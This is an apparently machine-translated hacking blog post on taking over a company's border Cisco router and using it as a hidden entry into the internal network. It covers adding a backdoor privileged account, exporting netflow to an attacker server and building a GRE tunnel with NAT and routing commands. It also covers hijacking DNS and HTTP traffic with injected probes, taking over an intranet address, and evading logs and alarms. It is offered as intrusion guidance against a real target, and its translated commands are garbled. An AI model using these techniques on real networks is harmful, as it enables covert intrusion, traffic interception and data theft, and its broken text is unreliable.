Use the intruded vro to enter the Intranet

Use the intruded vro to enter the Intranet

 

Last year, we started to use vrouters to penetrate the destination intranet. Before seeing wooyun, there was an article about translation of foreigners about routertraffic hijacking. The use conditions were harsh and the results were not very effective. So I decided to write an example of my own test.

0x01 control Router

There is no good way to do this. We caught some routers using distributed scanning, and added other vulnerabilities to ensure a certain number of tests.

Select a cisco c800 Series Small Business router (very old)

Figure 1 router version

After entering, first view the log and login authentication information.

Figure 2 router logon and other related information

There is a login restriction acl, which was deleted before, and the telnet password is found. If aaa authentication is not enabled, there is no authentication server or anything, and only local authentication is required. No log server configuration is available, and no snmp configuration is available (I still wanted to leave an snmp backdoor, which seems to be useless ).

Add the account password, reinforce the vro, and fix the vulnerability.

Figure 3 add a privileged account

0x02 network topology analysis

After completing the basic operations, save a complete configuration (which cannot be completely pasted) and analyze the basic network architecture.

This is a small branch of a company. Through pppoe and nat, there is a public IP address and 10. xx. xx.0/24 Intranet address, connected to the main company through the gre tunnel, has a larger intranet.

This type of network is the most common. The Internet address is obtained by dialing the ISP, and then the Intranet machine accesses the Internet through nat. Public IP addresses are rare in the company network.

The network topology is as follows:

Figure 4 network topology

0x03 prepare to enter the Intranet

Intranet machines access Google through NAT, and the Intranet is protected by NAT. We have taken control of the R1 router, which is at the egress of the Intranet. There is also a public network VPS, ubuntu12.04. R2 indicates that many routers have no control permissions.

To perform an intranet penetration test, you need more information. We also add a public network VPS (win2008R) to set up a traffic monitoring server to analyze the daily Intranet traffic and behavior.

Win2008 builds a netflow server and configures netflow on R1 to observe Intranet traffic information. There are a lot of netflow software online, and solarwind is the best. It supports sqlserver2005 and can store a large amount of data. No cracked version is found. The ManageEngine I use is cracked everywhere.

Netflow Configuration:

Ip flow-export so int e 0ip flow-ex dst 1.1.1.1 8888ip flow-ex ver 5 ......

The traffic analysis is intuitive. The company's daily work Traffic reaches the main network through GRE Tunnel. The daily traffic is mainly http and https, which can be seen through traffic statistics, most of their dns services are Google public dns, which accounts for more than 90% of all dns traffic.

Figure 6 target network traffic Overview

Figure 7 traffic classification

If I try to open these web pages for the web traffic statistics, I cannot open them. The Error 404 Not Found or a certificate error occurs. In this way, no website is accessed, and Google does not have any search records. Therefore, we can barely look at the same site of bing, with few results.

To find out more detailed information about the Intranet (what is the name of the company, what websites are frequently accessed by employees, and what is commonly used software), you can only hijack DNS first. Because the network environment is relatively poor, there is a NAT that makes the network too complex. Therefore, if you do not select transparent hijacking, you can choose gateway hijacking.

Let's explain the terms:

Transparent hijacking: a custom term is used to modify the data packet and checksum without modifying the source IP address and destination IP address of the data packet. In this way, users and servers will not be noticed, and they will be completely transparent. At the same time, they will not be able to be noticed by the kill soft firewall IPS, except for increasing latency.

Gateway hijacking: as the name suggests, as a gateway, It routes and NAT the traffic that passes through the gateway so that the traffic can be transmitted over the Internet normally. Will have a great impact, take Gmail as an example, will prompt remote login and so on.

 

There is an on-line hijacking (I concluded): hijacking traffic in a firewall or NAT environment, where do you take the packets, the data packet (the hijacked data packet or the returned data packet) must be sent back to the data packet.

Here, we will explain that traffic hijacking of the GRE channel in the NAT environment will be very troublesome. The outbound data packet first enters the GRE Tunnel through the path, and then acts as a GRE data packet through NAT, that is, NAT only takes effect for the GRE data packet and records the status, packets contained in GRE are not NAT, so the inbound traffic cannot pass NAT. This explanation applies to the firewall.

Due to limited programming capabilities, the gateway hijacking mode is decided.

Create GRE Tunnel on the port connecting to the public network of R1 and my Linux eth0

Linux IP Address: 1.1.1.1

Vro public IP Address: 2.2.2.2

R1 Configuration

Enconf tint tunnel 1 tunnel so e0 (interface name, you can also use the interface IP address, but there will be a problem) tunnel dest 1.1.1.1ip add 12.1.1.1 255.255.252end

Linux Ubuntu configuration: Create GRE Tunnel

# Modprobe ip_gre # lsmode | grep # ip tunnel add gre1 mode gre remote 2.2.2.2 local 1.1.1.1 ttl 255 # ip link set gre1 up # ip addr add 12.1.1.2 peer 12.1.1.1 dev gre1

PING the peer IP Address at both ends of Tunnel.

Then enable route forwarding

Change the value of/proc/sys/net/ip_forward to 1 (effective this time, and expired after restart)

Modify the/etc/sysctl. conf file to make the package forwarding take effect when the system starts.

Net. ipv4.ip _ forward = 1 first # Remove

Enable Iptables NAT

# Iptables-t nat-a postrouting-s 192.168.1.0/25-j SNAT-to-source 202.103.224.58

192 of the addresses are the addresses for NAT, and 202 of the addresses are existing public IP addresses. The configuration word takes effect and becomes invalid after restart.

Save iptables rules.

1 # service iptables save

Add an intranet route

Route add-net 10.0.0.0/8 gre1

The eight-bit network to 10.0.0.0 goes through the gre1 exit, that is, all go through the GRE tunnel.

Then, we use our own software to obtain DNS data content, which is inconvenient for posting.

After several days of dns hijacking, I saw that they had a clearer understanding of the Intranet after several days of access. Further modify the HTTP packet and add a probe. After finding out the problem, you are ready to join EXP to obtain the Intranet permission. The result is chrome and you will give up. It is inconvenient to paste the probe information.

There is also traffic such as telnet and ssh in the traffic, but it cannot be hijacked. the destination address is subject to acl restrictions. My Linux cannot be accessed and I can directly refuse it.

0x04 access the Intranet

Traffic cannot help me get Intranet permissions, so I can only access the Intranet by myself.

Forcibly hijack a valid IP address used by no one in the intranet and assign it to yourself by connecting to the linux openVPN. For the rest, you only need to add the host route for this IP address on the vro and add it to 10 on Linux. xx. xx. the default route of xx/8, and then my WorkStation gets the Intranet access permission (no VPN or other restrictions, the access permission is equivalent to the router permission ).

It is very casual to let your WorkStation into the Intranet. There are too many methods, because this Ubuntu is already in the intranet. OpenVPN configuration and add route configuration will not be pasted out, and there are too many Internet connections.

Figure 8 verify the Intranet connectivity of Ubuntu

Such Intranet penetration has the following advantages:

All your traffic will be considered as Intranet traffic by Intranet traffic devices. if the traffic is slightly larger, you can download files without worrying about alarms caused by excessive traffic. (Theoretically, no documents are taken off)

Hide on the vro to avoid netflow monitoring and remove logs. When leaving, you can directly use erases to store all the memory. Your behavior cannot be found on the Intranet. (Theory, never done)

If the address is hijacked properly, you can bypass the logon restrictions on the Intranet server (layer-3 restrictions ).

A good grasp of time can create the illusion that an employee on the Intranet can download a large number of files from the file server. (Theory, never done)

Disadvantages

Data packets are not encrypted, Which is annoying. The data packets are basically completely transparent. If there is no security device outside the router or an IPSec Tunnel is directly created, it is equivalent to no disadvantage.

 

In summary, it is highly concealed, much higher than VPN or horse. Even the log server can ignore him.

The title of this article is to enter the Intranet, rather than Intranet penetration.

All sensitive information has been modified.

0x05

Other small discussions

There are many studies on link latency. Taking Google I hijacked as an example, I am near Google and the Intranet path, and close to the Google end.

The average latency to Google is 0.617 ms.

Figure 9 Ubuntu to Google latency

The average latency from a vro to a Linux instance is 256 ms, while that from a vroping to a Linux instance is 180 ms.

Figure 10 Router network latency

In Linux, the software delay for modifying data packets is about 5 ms, so the estimated latency after hijacking is about ms.

However, after hijacking, the latency to the target is 248, which is less than 256 ms + 0.6 ms + 5 ms. Why.

The overall latency is increased by 1/3 of MS and about 60 ms.

We have discussed a lot about latency before: it increases the Latency by 1/3, And the impact will be obvious, so it is easy to detect and trigger an alarm. I personally think that the latency is increased by 500 ms or 1 s, even if the baidu O & M is completed after checking the IP address and watching tracert, it will scold the operator. What's more, network users generally do not think it is a problem of the operator. They only think that they are stuck in their own computer cards. May someone doubt that they have been hijacked by the network.

For the discussion of Intranet routers, The vro studied in this article is a network border router with at least one public IP address. When a vro or layer-3 switch is in the Intranet, the answer is yes if hijacking can be used. Build a layer-7 Application Layer tunnel (GRE is a layer-3 network layer tunnel), just like our PC, through the Intranet. Alternatively, you can directly establish a connection with a server on the Intranet to hijack the data (verified, but the peer end is a public network CISCO vro 2911 during public network testing, but you have not tried the server, and the development capability is limited ).

If you need to penetrate the Intranet, you need an application-layer VPN, such as IPSec VPN and ez vpn (I tested the two, and other VPNs above the three layers are theoretically feasible, the configuration is much more complex than GRE Tunnel, but it is very easy to understand the principle configuration. The configuration cannot be completed. In theory, the IP Sec VPN should be able to establish a connection to the IP Sec VPN Server. I did not succeed, but I am still studying it at the theoretical level. Ez vpn, CISCO exclusive, certainly cannot build a server on WIN or linux.

With regard to the residence, it is much better to extend the Intranet residence or the router backdoor residence through the vro. Apart from NSA and fireeye, I have never heard of anyone who has been in touch with the vro backdoor. There are only a few people who will configure the vro in China, let alone reverse lookup.

Discussion about HTTPS: The Green logo is indeed a headache. What I have tried so far is nesting, inserting red labels in the green logo, and finally seeing the green logo.

With regard to the traffic hijacking software, the Internet says that hijacking software is a lot of resources, but in fact, there is no one that can be used directly, especially in the transparent hijacking mode, I didn't find anything that can be used directly. Everyone agreed on something like MITMproxy or something. The actual test is suitable for developers to debug the software, so they can only develop the software by themselves, but the development capability is limited.

I hope you can recommend some software that can handle large traffic volumes (such as BGP hijacking) with high efficiency.